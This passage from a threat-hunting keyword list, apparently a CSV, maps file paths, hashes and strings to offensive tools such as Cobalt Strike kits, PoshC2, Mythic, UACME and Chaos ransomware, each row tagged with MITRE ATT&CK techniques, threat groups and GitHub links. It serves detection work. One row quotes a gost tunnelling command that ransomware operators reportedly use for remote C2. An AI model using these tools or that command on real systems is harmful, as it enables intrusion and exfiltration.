- Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/netero1010/ServiceMove-BOF,1,0,N/A,10,10,223,45,2022-02-23T07:17:38Z,2021-08-16T07:16:31Z -*c:\temp\something.ps1*,offensive_tool_keyword,No-powershell,powershell script to C# (no-powershell),T1059.001 - T1027 - T1500,TA0002 - TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/gtworek/PSBits/blob/master/Misc/No-PowerShell.cs,1,0,N/A,8,10,2669,471,2023-09-28T06:10:58Z,2019-06-29T13:22:36Z -*C:\temp\tmp.tmp*,offensive_tool_keyword,EDRSandblast-GodFault,Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.,T1547.002 - T1055.001 - T1205,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/gabriellandau/EDRSandblast-GodFault,1,0,N/A,10,2,180,34,2023-08-28T18:14:20Z,2023-06-01T19:32:09Z -*C:\Uac\results.cab*,offensive_tool_keyword,IDiagnosticProfileUAC,UAC bypass using auto-elevated COM object Virtual Factory for DiagCpl,T1548.002 - T1059.003 - T1027.002,TA0005 - TA0040,N/A,N/A,Privilege Escalation,https://github.com/Wh04m1001/IDiagnosticProfileUAC,1,0,N/A,10,2,173,32,2022-07-02T20:31:47Z,2022-07-02T19:55:42Z -*C:\Users\*\AppData\Roaming\Indexing.*,offensive_tool_keyword,JunctionFolder,Creates a junction folder in the Windows Accessories Start Up folder as described in the Vault 7 leaks. 
On start or when a user browses the directory - the referenced DLL will be executed by verclsid.exe in medium integrity.,T1547.001 - T1574.001 - T1204.002,TA0005 - TA0004,N/A,N/A,Persistence - Defense Evasion,https://github.com/matterpreter/OffensiveCSharp/tree/master/JunctionFolder,1,0,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z -*C:\Users\*\AppData\Roaming\svchost.exe*,offensive_tool_keyword,chaos,Chaos ransomware behavior,T1486,TA0040,chaos ransomware,N/A,Ransomware,https://blog.qualys.com/vulnerabilities-threat-research/2022/01/17/the-chaos-ransomware-can-be-ravaging,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*C:\Users\Public\*.dmp*,offensive_tool_keyword,Slackor,A Golang implant that uses Slack as a command and control server,T1059.003 - T1071.004 - T1562.001,TA0002 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/Coalfire-Research/Slackor,1,0,N/A,10,10,451,108,2023-02-25T03:35:15Z,2019-06-18T16:01:37Z -*c:\users\public\creds.log*,offensive_tool_keyword,undertheradar,scripts that afford the pentester AV bypass techniques,T1055.005 - T1027 - T1116 - T1070.004,TA0040 - TA0005 - TA0009,N/A,N/A,Defense Evasion,https://github.com/g3tsyst3m/undertheradar,1,0,N/A,9,1,7,0,2023-08-10T00:30:20Z,2023-07-01T17:59:20Z -*c:\users\public\output.txt*,offensive_tool_keyword,undertheradar,scripts that afford the pentester AV bypass techniques,T1055.005 - T1027 - T1116 - T1070.004,TA0040 - TA0005 - TA0009,N/A,N/A,Defense Evasion,https://github.com/g3tsyst3m/undertheradar,1,0,N/A,9,1,7,0,2023-08-10T00:30:20Z,2023-07-01T17:59:20Z -*C:\Users\Public\perm.txt*,offensive_tool_keyword,CheeseTools,tools for Lateral Movement/Code Execution,T1021.006 - T1059.003 - T1105,TA0008 - TA0002,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/klezVirus/CheeseTools,1,0,N/A,10,7,653,138,2021-08-17T20:22:56Z,2020-08-24T01:28:12Z -*C:\Users\Public\test.txt*,offensive_tool_keyword,CheeseTools,tools for Lateral Movement/Code Execution,T1021.006 - T1059.003 - T1105,TA0008 - 
TA0002,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/klezVirus/CheeseTools,1,0,N/A,10,7,653,138,2021-08-17T20:22:56Z,2020-08-24T01:28:12Z -*C:\Windows\DirectX.log*\Windows\Temp\backup.log*,offensive_tool_keyword,Shellcode-Loader,dynamic shellcode loading,T1055 - T1055.012 - T1027 - T1027.005,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/ReversingID/Shellcode-Loader,1,0,N/A,10,2,139,30,2023-09-08T06:55:34Z,2021-08-08T08:53:03Z -*C:\Windows\MEMORY.DMP*,greyware_tool_keyword,CIMplant,C# port of WMImplant which uses either CIM or WMI to query remote systems,T1047 - T1059.001 - T1021.006,TA0002 - TA0007 - TA0008,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/RedSiege/CIMplant,1,0,N/A,10,2,189,30,2021-07-14T18:18:42Z,2021-01-29T21:41:58Z -*C:\Windows\System.exe* -L rtcp://0.0.0.0:8087/127.0.0.1:4444 -F socks5://*:*@*:443*,offensive_tool_keyword,gost,Ransomware operators actively use Gost capabilities () in order to communicate with their remote server. using the command below. To hide the software in plain sight. they rename it to `System.exe` or `update.exe`.,T1568 - T1001 - T1027 - T1041,TA0002 - TA0011,N/A,N/A,Data Exfiltration,https://github.com/ginuerzh/gost,1,0,N/A,N/A,10,13872,2298,2023-09-21T04:01:17Z,2015-03-20T09:45:08Z -*C:\Windows\Temp\move.exe*,offensive_tool_keyword,cobaltstrike,Cobalt Strike kit for Lateral Movement,T1021.002 - T1021.006 - T1021.004,TA0008 - TA0002,N/A,N/A,Lateral Movement,https://github.com/0xthirteen/MoveKit,1,1,N/A,10,7,615,114,2020-02-21T20:23:45Z,2020-01-24T22:19:16Z -*C:\Windows\Temp\moveme.exe*,offensive_tool_keyword,cobaltstrike,Cobalt Strike kit for Lateral Movement,T1021.002 - T1021.006 - T1021.004,TA0008 - TA0002,N/A,N/A,Lateral Movement,https://github.com/0xthirteen/MoveKit,1,1,N/A,10,7,615,114,2020-02-21T20:23:45Z,2020-01-24T22:19:16Z -*c:\windows\temp\test.tmp farmer*,offensive_tool_keyword,Farmer,Farmer is a project for collecting NetNTLM hashes in a Windows domain. 
Farmer achieves this by creating a local WebDAV server that causes the WebDAV Mini Redirector to authenticate from any connecting clients.,T1557.001 - T1056.004 - T1078.003,TA0006 - TA0004 - TA0001,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/mdsecactivebreach/Farmer,1,0,N/A,10,4,308,49,2021-04-28T15:27:24Z,2021-02-22T14:32:29Z -*C??/generator.cpp*,offensive_tool_keyword,cobaltstrike,CS anti-killing including python version and C version,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Gality369/CS-Loader,1,1,N/A,10,10,751,149,2021-08-11T06:43:52Z,2020-08-17T21:33:06Z -*c0ddb8ed4e267153cd7fd2fb858e0a18fd8fa88ddc3f748bcee35372f41bec46*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*c1090dbc-f2f7-4d90-a241-86e0c0217786*,offensive_tool_keyword,kubesploit,Kubesploit is a cross-platform 
post-exploitation HTTP/2 Command & Control server and agent written in Golang,T1021.001 - T1027 - T1071.001 - T1043 - T1059.006,TA0005 - TA0002 - TA0011,N/A,N/A,C2,https://github.com/cyberark/kubesploit,1,0,N/A,10,10,1030,102,2023-04-08T08:32:23Z,2021-02-09T15:54:23Z -*c1405b280bacc7566ccd041a74461de3f8496128fd71e39368905cf8d95268f6*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*C2 Client*,offensive_tool_keyword,nimplant,A light-weight first-stage C2 implant written in Nim,T1059-001 - T1027 - T1036,TA0002 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/chvancooten/NimPlant,1,0,N/A,10,10,641,85,2023-08-31T14:52:00Z,2023-02-13T13:42:39Z -*C2 Framework for villains*,offensive_tool_keyword,nimbo-c2,Nimbo-C2 is yet another (simple and lightweight) C2 framework,T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/itaymigdal/Nimbo-C2,1,0,N/A,10,10,234,35,2023-10-01T08:09:18Z,2022-10-08T19:02:58Z -*C2 Nimplant Server*,offensive_tool_keyword,nimplant,A light-weight first-stage C2 implant written in Nim,T1059-001 - T1027 - T1036,TA0002 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/chvancooten/NimPlant,1,0,N/A,10,10,641,85,2023-08-31T14:52:00Z,2023-02-13T13:42:39Z -*C2 Server*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,0,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*C2.KillDate*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 
framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*c2.striker.*,offensive_tool_keyword,Striker,Striker is a simple Command and Control (C2) program.,T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/4g3nt47/Striker,1,1,N/A,10,10,279,43,2023-05-04T18:00:05Z,2022-09-07T10:09:41Z -*C2.UserAgent*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*C2/C2Server.*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - 
TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*C2_RPC_functions.py*,offensive_tool_keyword,mythic,A collaborative multi-platform red teaming framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003,N/A,N/A,C2,https://github.com/its-a-feature/Mythic,1,1,N/A,10,10,2490,383,2023-10-03T23:06:16Z,2018-07-05T02:09:59Z -*c2_server*.py*,offensive_tool_keyword,FudgeC2,FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.,T1021.002 - T1105 - T1059.001 - T1059.003,TA0008 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/Ziconius/FudgeC2,1,1,N/A,10,10,237,54,2023-05-01T21:13:56Z,2018-09-09T21:05:21Z -*c2_server.resources*,offensive_tool_keyword,FudgeC2,FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.,T1021.002 - T1105 - T1059.001 - T1059.003,TA0008 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/Ziconius/FudgeC2,1,0,N/A,10,10,237,54,2023-05-01T21:13:56Z,2018-09-09T21:05:21Z -*C2_Server-main*,offensive_tool_keyword,C2_Server,C2 server to connect to a victim machine via reverse shell,T1090 - T1090.001 - T1071 - T1071.001,TA0011 ,N/A,N/A,C2,https://github.com/reveng007/C2_Server,1,1,N/A,10,10,31,17,2022-02-27T02:00:02Z,2021-03-05T12:35:45Z -*c2_service.sh*,offensive_tool_keyword,mythic,A collaborative multi-platform red teaming framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003,N/A,N/A,C2,https://github.com/its-a-feature/Mythic,1,1,N/A,10,10,2490,383,2023-10-03T23:06:16Z,2018-07-05T02:09:59Z -*c204e44cffb51d95128971ec8b31e668e3b4f50ba3f4082c36ced76c2b30bc63*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by 
abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*C2concealer -*,offensive_tool_keyword,C2concealer,C2concealer is a command line tool that generates randomized C2 malleable profiles for use in Cobalt Strike.,T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001,TA0042 - TA0005 - TA0011,N/A,N/A,C2,https://github.com/RedSiege/C2concealer,1,0,N/A,10,10,850,162,2021-09-26T16:37:06Z,2020-03-23T14:13:16Z -*C2concealer-master*,offensive_tool_keyword,C2concealer,C2concealer is a command line tool that generates randomized C2 malleable profiles for use in Cobalt Strike.,T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001,TA0042 - TA0005 - TA0011,N/A,N/A,C2,https://github.com/RedSiege/C2concealer,1,1,N/A,10,10,850,162,2021-09-26T16:37:06Z,2020-03-23T14:13:16Z -*'C2Default'*,offensive_tool_keyword,Ninja,Open source C2 server created for stealth red team operations,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/ahmedkhlief/Ninja,1,1,N/A,10,10,720,166,2022-09-26T16:07:43Z,2020-03-04T14:17:22Z -*c2endpoint.php*,offensive_tool_keyword,kubesploit,Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang,T1021.001 - T1027 - T1071.001 - T1043 - T1059.006,TA0005 - TA0002 - TA0011,N/A,N/A,C2,https://github.com/cyberark/kubesploit,1,1,N/A,10,10,1030,102,2023-04-08T08:32:23Z,2021-02-09T15:54:23Z -*c2hlbGxjb2Rl*,offensive_tool_keyword,C2 related tools,Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/Rvn0xsy/Cooolis-ms,1,1,N/A,10,10,868,140,2023-05-22T22:18:47Z,2019-03-31T14:23:57Z -*c2lint *,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik 
Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,0,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -*C2ListenerPort*,offensive_tool_keyword,cobaltstrike,A tool that can perform reverse proxy and cs online without going online,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Daybr4ak/C2ReverseProxy,1,1,N/A,10,10,457,56,2023-04-26T13:16:26Z,2020-01-16T05:43:35Z -*c2-logs.txt*,offensive_tool_keyword,Ninja,Open source C2 server created for stealth red team operations,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/ahmedkhlief/Ninja,1,1,N/A,10,10,720,166,2022-09-26T16:07:43Z,2020-03-04T14:17:22Z -*c2profile.profile*,offensive_tool_keyword,crossc2,generate CobaltStrike's cross-platform payload,T1547.001 - T1055 - T1027 - T1105 - T1047,TA0002 - TA0005 - 
TA0011,N/A,N/A,C2,https://github.com/gloxec/CrossC2,1,1,N/A,10,10,1894,321,2023-08-08T20:02:44Z,2020-01-16T16:39:09Z -*C2ProfileManager.*,offensive_tool_keyword,mythic,A .NET Framework 4.0 Windows Agent,T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Apollo/,1,0,N/A,10,10,401,83,2023-08-17T14:46:04Z,2020-11-09T08:05:16Z -*C2ProfileResponse.cs*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*-c2-randomizer.py*,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,1,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -*C2ReverseClint*,offensive_tool_keyword,cobaltstrike,A tool that can perform reverse proxy and cs online without going online,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Daybr4ak/C2ReverseProxy,1,1,N/A,10,10,457,56,2023-04-26T13:16:26Z,2020-01-16T05:43:35Z -*C2ReverseProxy*,offensive_tool_keyword,cobaltstrike,A tool that can perform reverse proxy and cs online without going online,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - 
T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Daybr4ak/C2ReverseProxy,1,1,N/A,10,10,457,56,2023-04-26T13:16:26Z,2020-01-16T05:43:35Z -*C2ReverseServer*,offensive_tool_keyword,cobaltstrike,A tool that can perform reverse proxy and cs online without going online,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Daybr4ak/C2ReverseProxy,1,1,N/A,10,10,457,56,2023-04-26T13:16:26Z,2020-01-16T05:43:35Z -*C2script/proxy.*,offensive_tool_keyword,cobaltstrike,A tool that can perform reverse proxy and cs online without going online,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 
- T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Daybr4ak/C2ReverseProxy,1,1,N/A,10,10,457,56,2023-04-26T13:16:26Z,2020-01-16T05:43:35Z -*'c2server'*,offensive_tool_keyword,cobaltstrike,Convert Cobalt Strike profiles to modrewrite scripts,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - 